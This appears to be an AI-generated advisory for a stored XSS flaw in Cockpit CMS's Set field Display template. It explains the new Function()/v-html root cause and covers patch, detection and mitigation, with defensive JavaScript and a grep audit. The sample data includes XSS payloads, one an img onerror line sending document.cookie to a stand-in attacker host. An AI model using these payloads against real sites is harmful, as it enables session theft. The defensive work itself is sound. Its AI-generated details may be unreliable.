CVE-2026-23695 Overview
CVE-2026-23695 is a stored cross-site scripting (XSS) vulnerability in Cockpit CMS through version 2.14.0. The flaw resides in the Set field type's Display template option, where the template string is processed by the $interpolate function using new Function() and rendered via Vue's v-html directive without sanitization. An attacker holding the content/:models/manage permission can inject arbitrary JavaScript into the Display template. The payload executes in the browser of any user viewing the collection items list. The issue is tracked under [CWE-79] and was patched in commit 72a83fc.
Critical Impact
Authenticated users with content model management permissions can inject persistent JavaScript that executes against any administrator browsing the affected collection.
Affected Products
- Cockpit CMS versions through 2.14.0
- Cockpit CMS Set field type Display template option
- Cockpit CMS instances exposing the content/:models/manage permission to non-administrators
Discovery Timeline
- 2026-05-15 - CVE-2026-23695 published to NVD
- 2026-05-18 - Last updated in NVD database
Technical Details for CVE-2026-23695
Vulnerability Analysis
The vulnerability stems from unsafe template evaluation in the Cockpit CMS admin interface. The App.utils.$interpolate helper compiles the user-supplied Display template string into executable JavaScript using new Function(). The resulting markup is then rendered through Vue's v-html directive, which bypasses standard HTML escaping. Because the Display template is stored as part of the field definition, the injected payload persists in the database and re-executes for every user that loads the collection items list. The attack falls under [CWE-79], stored cross-site scripting.
Root Cause
The root cause is the combination of two unsafe primitives. First, $interpolate evaluates template strings through the Function constructor, providing a JavaScript execution sink. Second, the output is bound with v-html, removing Vue's built-in output encoding. No sanitization or allow-listing is applied to the template input, so any script content supplied by a user with model-management rights is preserved and rendered.
Attack Vector
An authenticated attacker with content/:models/manage permission edits a Set field and supplies a malicious Display template containing JavaScript. When another user, typically an administrator, navigates to the collection items list, the template is interpolated and inserted into the DOM via v-html. The attacker's script then executes in the victim's session, enabling session token theft, CSRF-style admin actions, or pivoting to higher-privileged accounts.
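The evaluation chain described in the analysis, root cause and attack vector above, as an added example that is not Cockpit's code: a minimal model of an interpolator built on new Function() beside a hardened stand-in that substitutes only dotted field paths and HTML-escapes everything it emits. The ${...} template syntax, the data shape and the payload are assumptions for illustration; the hardened version is a simplified replacement, not the vendor's JSLiteEngine.

```javascript
// Added example (not Cockpit's code). Template syntax ${expr}, the data object
// and the payload are assumptions used to show the two behaviours side by side.

// Vulnerable pattern: the stored template becomes the body of a JS template
// literal inside new Function(), so any expression in ${...} runs with full
// JavaScript privileges, and the returned markup is later bound with v-html.
function interpolateUnsafe(template, data) {
  // eslint-disable-next-line no-new-func
  return new Function("data", "return `" + template + "`")(data);
}

// Hardened stand-in: only plain dotted field paths are accepted, own
// properties only (blocks constructor/__proto__ walks), and both static text
// and substituted values are HTML-escaped so the result is safe for v-text
// and carries no executable markup even if it is still bound with v-html.
const PATH_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function lookupPath(path, data) {
  return path.split(".").reduce(
    (obj, key) =>
      obj != null && Object.prototype.hasOwnProperty.call(obj, key) ? obj[key] : undefined,
    data
  );
}

function interpolateSafe(template, data) {
  const re = /\$\{([^}]*)\}/g;
  let out = "";
  let last = 0;
  let m;
  while ((m = re.exec(template)) !== null) {
    out += escapeHtml(template.slice(last, m.index));
    const expr = m[1].trim();
    // Anything that is not a bare field path is rejected, never evaluated.
    if (!PATH_RE.test(expr)) throw new Error(`rejected template expression: ${expr}`);
    const value = lookupPath(expr, data);
    out += escapeHtml(value == null ? "" : value);
    last = re.lastIndex;
  }
  return out + escapeHtml(template.slice(last));
}

// Constructed item data and templates (not from any real instance).
const ITEM = { title: "Hello & <b>", secret: "tok" };
const BENIGN = "T: ${title}";
const STEAL = "T: ${globalThis.__pwned = data.secret}";      // runs JS in the viewer's session
const MARKUP = "<img src=x onerror=alert(1)>";                 // passes straight through to v-html

function demo() {
  return {
    unsafeSteal: interpolateUnsafe(STEAL, ITEM),   // "T: tok", and __pwned is now set
    unsafeMarkup: interpolateUnsafe(MARKUP, ITEM), // markup returned untouched
    safeBenign: interpolateSafe(BENIGN, ITEM),     // "T: Hello &amp; &lt;b&gt;"
    safeProto: interpolateSafe("${constructor.constructor}", ITEM), // "" (no own property)
  };
}
```

Escaping the static text as well as the values is deliberate: with content/:models/manage held by a non-administrator, the template author is the attacker, so markup in the template itself is the stored payload and cannot be trusted any more than the expressions in it.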
// Security patch from commit 72a83fc - modules/App/assets/js/app/utils.js
// Replaces App.utils.$interpolate / App.utils.interpolate Function-based eval
+import { Engine as JSLiteEngine } from "../../vendor/jslite.esm.js";
+
let formatSize = function(bytes) {
if (bytes == 0) { return "0.00 B"; }
let e = Math.floor(Math.log(bytes) / Math.log(1024));
// Source: https://github.com/Cockpit-HQ/Cockpit/commit/72a83fcfe85ad8330e9ae834bc02fa517b5749e9
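Review bot: the excerpt ends after the added JSLiteEngine import and the first three lines of formatSize, before the $interpolate / interpolate definitions that the header comment says are replaced, so as shown the hunk introduces an import with no visible use and does not show how the engine's result is rendered. Extend the excerpt to the replaced $interpolate body and confirm there that the returned string is escaped or rendered with v-text rather than bound with v-html: a sandboxed expression engine closes the code-execution sink, but an attacker-controlled template can still carry markup such as <img onerror=...> that v-html would inject unchanged.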
The fix replaces the Function-based evaluator with the JSLiteEngine sandboxed expression engine, removing the arbitrary code execution sink. The excerpt above stops before the replaced $interpolate body, so it does not show whether the engine's output still reaches the DOM through v-html; a sandboxed evaluator blocks JavaScript in the expression, not HTML injected through the returned string, so confirm after upgrading that template output is escaped or no longer bound with v-html.
Detection Methods for CVE-2026-23695
Indicators of Compromise
- Set field definitions containing <script>, onerror=, onload=, or other event handler attributes inside the Display template value.
- Unexpected modifications to content model JSON definitions in the Cockpit storage backend.
- Outbound requests from an administrator's browser session to unexpected hosts, or admin API calls the administrator did not initiate, immediately after that session loads a collection items list.
Detection Strategies
- Audit stored content model definitions for Display template strings that contain HTML tags, event-handler attributes, or ${...} expressions that do more than name a field path (function calls, Function(, constructor, assignments). Legitimate field references also use ${...}, so the presence of ${ on its own is not an indicator.
- Enable Content Security Policy (CSP) reporting and review violations triggered by inline script execution in the Cockpit admin UI.
- Review Cockpit access logs for accounts with content/:models/manage permission that recently modified Set field configurations.
Monitoring Recommendations
- Monitor changes to the collections and models storage for non-administrator users editing field templates.
- Alert on outbound requests from admin browser sessions to unexpected destinations following access to /admin/content/collection/entries.
- Track privilege grants of content/:models/manage and review whether the role is required for each assigned user.
How to Mitigate CVE-2026-23695
Immediate Actions Required
- Upgrade Cockpit CMS to a release newer than 2.14.0 that includes commit 72a83fc.
- Audit existing Set field Display templates and remove any entries containing scripts or HTML event handlers.
- Restrict content/:models/manage permission to fully trusted administrators only.
Patch Information
The vendor fix is published in Cockpit-HQ commit 72a83fc, which replaces the Function-based $interpolate evaluator with the sandboxed JSLiteEngine. Additional context is available in the VulnCheck Security Advisory.
Workarounds
- Revoke content/:models/manage permission from non-administrator roles until patched builds are deployed.
- Apply a strict Content Security Policy that blocks inline script execution in the Cockpit admin UI.
- Manually sanitize stored Display template values to remove HTML and JavaScript constructs.
# Search existing Cockpit storage for suspicious Display templates.
# The storage paths and the "display" key name are placeholders; adjust them to
# the storage layout of the instance. The pattern only matches a definition
# stored on a single line; pretty-printed or escaped JSON needs a structure-aware scan.
grep -rEi '"display"\s*:\s*".*(<script|onerror=|onload=|javascript:).*"' \
/path/to/cockpit/storage/data/collections/ \
/path/to/cockpit/storage/data/models/
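A structure-aware version of the audit from the Detection Strategies section and the grep above, as an added example that is not Cockpit's code: it walks a content model definition, descends into nested Set fields, and flags Display templates that carry markup, event handlers, javascript: URLs, or ${...} expressions that are not plain field paths. The definition shape (fields[], opts.fields for nested Sets, opts.display for the template) and the sample model are assumptions; map them onto the real storage format of the instance.

```javascript
// Added example (not Cockpit's code). Model shape and sample data are assumed.

const PATH_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
// Tags, inline event handlers (onerror=, onload=, ...) and javascript: URLs.
const MARKUP_RE = /<\s*\/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:/i;

// Reasons a single Display template looks unsafe; empty array if it is benign.
// A bare ${field} or ${a.b} is allowed, anything else inside ${...} is flagged.
function templateFindings(template) {
  const reasons = [];
  if (MARKUP_RE.test(template)) {
    reasons.push("contains an HTML tag, event handler attribute or javascript: URL");
  }
  for (const m of template.matchAll(/\$\{([^}]*)\}/g)) {
    const expr = m[1].trim();
    if (!PATH_RE.test(expr)) reasons.push(`expression is not a plain field path: ${expr}`);
  }
  return reasons;
}

// Walk the field list recursively; Set fields carry their own child fields
// under opts.fields, which is where a grep over top-level keys can miss them.
function auditFields(fields, prefix = "") {
  const findings = [];
  for (const field of fields || []) {
    const path = prefix + field.name;
    const opts = field.opts || {};
    if (typeof opts.display === "string") {
      const reasons = templateFindings(opts.display);
      if (reasons.length) findings.push({ path, template: opts.display, reasons });
    }
    if (field.type === "set" && Array.isArray(opts.fields)) {
      findings.push(...auditFields(opts.fields, path + "."));
    }
  }
  return findings;
}

function auditModel(model) {
  return auditFields(model.fields, `${model.name}:`);
}

// Constructed sample model (not taken from any real instance): two benign Set
// templates, one nested Set with an inline event handler, and one Set whose
// expression reaches Function via constructor.constructor.
const SAMPLE_MODEL = {
  name: "posts",
  fields: [
    { name: "title", type: "text" },
    { name: "author", type: "set", opts: {
        display: "${name} (${email})",
        fields: [{ name: "name", type: "text" }, { name: "email", type: "text" }] } },
    { name: "gallery", type: "set", opts: {
        display: "${caption}",
        fields: [
          { name: "caption", type: "text" },
          { name: "credit", type: "set", opts: {
              display: "<img src=x onerror=\"fetch('https://attacker.invalid/?c='+document.cookie)\">",
              fields: [{ name: "who", type: "text" }] } },
        ] } },
    { name: "meta", type: "set", opts: {
        display: "${constructor.constructor('alert(1)')()}",
        fields: [{ name: "k", type: "text" }] } },
  ],
};

function demo() {
  return auditModel(SAMPLE_MODEL); // two findings: posts:gallery.credit and posts:meta
}
```

Run auditModel over every stored model definition and treat any finding as a stored payload to remove, then review who last edited that field under the content/:models/manage permission.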
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


